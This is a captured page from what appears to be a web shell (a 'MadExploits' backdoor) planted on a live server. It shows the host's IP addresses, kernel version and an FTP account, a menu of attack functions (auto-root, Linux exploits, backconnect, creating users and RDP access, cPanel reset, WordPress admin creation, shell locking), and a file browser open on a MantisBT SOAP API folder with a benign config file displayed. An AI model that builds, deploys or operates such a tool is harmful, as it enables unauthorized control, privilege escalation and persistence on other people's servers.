Linux server.thearyasamaj.org 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
Apache
: 103.90.241.146 | : 216.73.216.222
Cant Read [ /etc/named.conf ]
5.6.40
ftpuser@mantra.thearyasamaj.org
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
thearyasamaj /
public_html /
mantis /
api /
soap /
[ HOME SHELL ]
Name
Size
Permission
Action
mantisconnect.php
4.18
KB
-rw-r--r--
mantisconnect.wsdl
84.11
KB
-rw-r--r--
mc_account_api.php
1.05
KB
-rw-r--r--
mc_api.php
18.67
KB
-rw-r--r--
mc_config_api.php
991
B
-rw-r--r--
mc_config_defaults_inc.php
2.77
KB
-rw-r--r--
mc_core.php
1.19
KB
-rw-r--r--
mc_custom_field_api.php
1.05
KB
-rw-r--r--
mc_enum_api.php
10.05
KB
-rw-r--r--
mc_file_api.php
7.35
KB
-rw-r--r--
mc_filter_api.php
4.97
KB
-rw-r--r--
mc_issue_api.php
56.63
KB
-rw-r--r--
mc_issue_attachment_api.php
3.48
KB
-rw-r--r--
mc_project_api.php
32.84
KB
-rw-r--r--
mc_project_attachment_api.php
3.47
KB
-rw-r--r--
mc_tag_api.php
5.14
KB
-rw-r--r--
mc_user_pref_api.php
1.13
KB
-rw-r--r--
mc_user_profile_api.php
2.18
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : mc_config_defaults_inc.php
<?php # MantisConnect - A webservice interface to Mantis Bug Tracker # Copyright (C) 2004-2013 Victor Boctor - vboctor@users.sourceforge.net # This program is distributed under dual licensing. These include # GPL and a commercial licenses. Victor Boctor reserves the right to # change the license of future releases. # See docs/ folder for more details # Minimum global access level required to access webservice for readonly operations. $g_mc_readonly_access_level_threshold = REPORTER; # Minimum global access level required to access webservice for read/write operations. $g_mc_readwrite_access_level_threshold = REPORTER; # Minimum global access level required to access the administrator webservices $g_mc_admin_access_level_threshold = MANAGER; # Minimum project access level required to be able to specify a reporter name when # adding an issue. Otherwise, the current user is used as the reporter. Users # who don't have this access level can always do another step to modify the issue # and specify a different name, but in this case it will be logged in the history # who original reported the issue. $g_mc_specify_reporter_on_add_access_level_threshold = DEVELOPER; # The following enum ids are used when the webservices get enum labels that are not # defined in the associated MantisBT installation. In this case, the enum id is set # to the value specified by the corresponding configuration option. $g_mc_priority_enum_default_when_not_found = 0; $g_mc_severity_enum_default_when_not_found = 0; $g_mc_status_enum_default_when_not_found = 0; $g_mc_resolution_enum_default_when_not_found = 0; $g_mc_projection_enum_default_when_not_found = 0; $g_mc_eta_enum_default_when_not_found = 0; # If ON and the supplied category is not found, then a SoapException will be raised. # (at the moment this value does not depend on the project). $g_mc_error_when_category_not_found = ON; # Default category to be used if the specified category is not found and $g_mc_error_when_category_not_found == OFF. $g_mc_category_when_not_found = ''; # If ON and the supplied version is not found, then a SoapException will be raised. $g_mc_error_when_version_not_found = ON; # Default version to be used if the specified version is not found and $g_mc_error_when_version_not_found == OFF. # (at the moment this value does not depend on the project). $g_mc_version_when_not_found = ''; /** * MantisConnect - use nusoap for SOAP handling * * <p>When the native PHP extension is available this flag default to OFF, which means that nusoap * will not used. The native extension has the advantage of being faster, more memory efficient and * maintained to work with recent versions on PHP. When the extension is not available * MantisBT falls back to using nusoap.</p> */ $g_mc_use_nusoap = extension_loaded('soap') ? OFF : ON;
Close